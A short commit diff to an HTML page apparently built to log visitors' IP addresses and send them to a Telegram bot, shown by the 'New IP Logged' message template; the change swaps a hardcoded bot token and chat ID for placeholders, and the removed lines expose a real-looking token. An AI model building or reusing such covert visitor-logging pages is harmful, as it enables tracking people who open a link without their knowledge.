Update thoda bach kr 4.html

--- a/thoda bach kr 4.html
+++ b/thoda bach kr 4.html
@@ -240,8 +240,8 @@
    };
    
    // 🟢 Your Telegram BOT Token and Chat ID
-   const BOT_TOKEN = "8139957696:AAH82WxzggZ0SQzdfBM5Rxtshq0pp3KjsLo";
-   const CHAT_ID = "5614532722";
+   const BOT_TOKEN = "enter your bot token";
+   const CHAT_ID = "enter your chat id";
    
    const message = `
    📡 *New IP Logged*
